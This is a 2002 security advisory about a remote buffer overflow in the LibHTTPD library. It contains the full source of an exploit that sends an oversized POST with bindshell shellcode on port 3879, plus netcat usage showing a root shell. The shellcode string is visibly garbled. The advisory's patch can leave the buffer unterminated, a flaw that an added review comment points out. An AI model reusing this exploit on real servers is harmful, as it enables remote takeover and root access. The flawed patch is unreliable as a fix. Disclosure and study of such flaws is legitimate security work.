Remote Buffer Overflow vulnerability in Lib HTTPd

by Nikola Strahija on November 13th, 2002

LibHTTPD can be used to add basic web server capabilities to an application or embedded device. For details, refer to the vendor homepage listed below. :-) Examining 'api.c' in the source of the libhttpd.a library reveals the vulnerability. It is in httpdProcessRequest(), at line 860:


860 void httpdProcessRequest(server)
861 httpd *server;
862 {
863 char dirName[HTTP_MAX_URL],
...
869 server->response.responseLength = 0;
870 strcpy(dirName, httpdRequestPath(server)); // here.
--

The result is a critical vulnerability that lets a remote attacker obtain a root shell.
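A bounded replacement for the strcpy() at line 870, as an added example that is not code from libhttpd or from the original advisory. It rejects over-long request paths instead of truncating them, and shows why strncpy() bounded by the full buffer size still leaves the buffer unterminated. The value of HTTP_MAX_URL and the helper names are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define HTTP_MAX_URL 1024   /* assumed value; take the real one from the library headers */

/* Hypothetical helper: copy a request path into a fixed-size buffer.
 * Returns 0 on success, -1 if the path does not fit, in which case the
 * caller should send an error response instead of processing the request. */
int copy_request_path(char *dst, size_t dstlen, const char *src)
{
    const char *end;
    size_t n;

    if (dst == NULL || src == NULL || dstlen == 0)
        return -1;
    end = memchr(src, '\0', dstlen);   /* scans at most dstlen bytes of src */
    if (end == NULL) {                 /* no room left for the terminating NUL */
        dst[0] = '\0';
        return -1;
    }
    n = (size_t)(end - src);
    memcpy(dst, src, n + 1);           /* n + 1 <= dstlen, includes the NUL */
    return 0;
}

/* strncpy(buf, src, sizeof buf) writes no terminator when src holds
 * sizeof buf bytes or more. Returns 1 if buf ends up without a NUL. */
int strncpy_leaves_unterminated(const char *src)
{
    char buf[HTTP_MAX_URL];

    memset(buf, 'X', sizeof buf);
    strncpy(buf, src, sizeof buf);
    return memchr(buf, '\0', sizeof buf) == NULL;
}

int main(void)
{
    char dirName[HTTP_MAX_URL];
    char longPath[HTTP_MAX_URL + 64];  /* constructed over-long request path */

    memset(longPath, 'A', sizeof longPath - 1);
    longPath[0] = '/';
    longPath[sizeof longPath - 1] = '\0';
    printf("short path accepted: %d\n", copy_request_path(dirName, sizeof dirName, "/index.html"));
    printf("long path rejected:  %d\n", copy_request_path(dirName, sizeof dirName, longPath));
    printf("strncpy unterminated: %d\n", strncpy_leaves_unterminated(longPath));
    return 0;
}
```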


0x02. Vulnerable Packages


Vendor site: http://www.hughes.com.au/products/libhttpd/

libhttpd-1.2
-libhttpd-1.2.tar.gz
+Linux
+Other


0x03. Exploit


This exploit code proves the vulnerability.
Through a remote attack, it obtains 'root' privileges.

Netcat makes the exploit very easy to use.

A brief explanation of the exploit:
The POST request is filled with many copies of the &shellcode address.
The NOPs and the shellcode come next.
(Port 3879 bindshell code)


=== 0x82-Remote.libhttpdxpl.c ===

/*
**
** Lib HTTPd Remote Buffer Overflow exploit
** by Xpl017Elz
** __
** Testing exploit:
**
** bash$ (./0x82-Remote.libhttpdxpl;cat)|nc libhttphost 80
**
** (Ctrl+c)
** punt!
** bash$ nc libhttphost 3879
** uname
** Linux
** id
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),
** 3(sys),4(adm),6(disk),10(wheel)
** exit
** bash$
**
** --
** exploit by "you dong-hun"(Xpl017Elz), .
** My World: http://x82.i21c.net
**
*/

#include
int main(/* args? */)
{
int shadd2r;
char b1ndsh[] = /* 129byte bindshellcode */
"2113451322262f2113201311211313C211]370C211]364K211M374215M"
"3643152001311211E364Cf211]354f307E35617'211M360215E354211E"
"370306E37420211320215M364315200211320CC315200211320C315"
"2002113031311262?211320315200211320A31520035330^211u"
"b1300210F07211Ef26013211363215Mb215Uf315200350343377"
"377377/bin/sh";
//--- POST &shellcode ---//
fprintf(stdout,"POST ");
for(shadd2r=0;shadd2r<0x408;shadd2r+=4)
{/* rEDhAT Default: 0x804e482,
Debian Address? */
fprintf(stdout,"20234404b");
}
fprintf(stdout,"rn");
//--- NOP,shellcode ---//
for(shadd2r=0;shadd2r<0x3e8;shadd2r++)
{/* SSSSSSSS...SSSSSSSSS;;; */
fprintf(stdout,"S");
}
fprintf(stdout,"%srnx0xrnx82rnl0lrn",b1ndsh);
}

=== eof ===


0x04. Patch


=== api.patch ===

--- api.c Sat Nov 9 20:06:30 2002
+++ api.patch.c Sat Nov 9 20:05:33 2002
@@ -867,7 +867,7 @@
httpContent *entry;

server->response.responseLength = 0;
- strcpy(dirName, httpdRequestPath(server));
+ strncpy(dirName, httpdRequestPath(server), HTTP_MAX_URL);
cp = rindex(dirName, '/');
if (cp == NULL)
{
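Review bot: the strncpy() on the added line uses the full buffer size HTTP_MAX_URL as its bound, so when httpdRequestPath(server) returns HTTP_MAX_URL bytes or more, dirName (declared as char dirName[HTTP_MAX_URL]) is filled with no terminating NUL and the rindex(dirName, '/') on the following line reads past the end of the array. Bound the copy at HTTP_MAX_URL - 1 and set dirName[HTTP_MAX_URL - 1] = '\0' afterwards, or check the length of the request path first and reject the request with an error rather than silently truncating it.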

=== eof ===

--


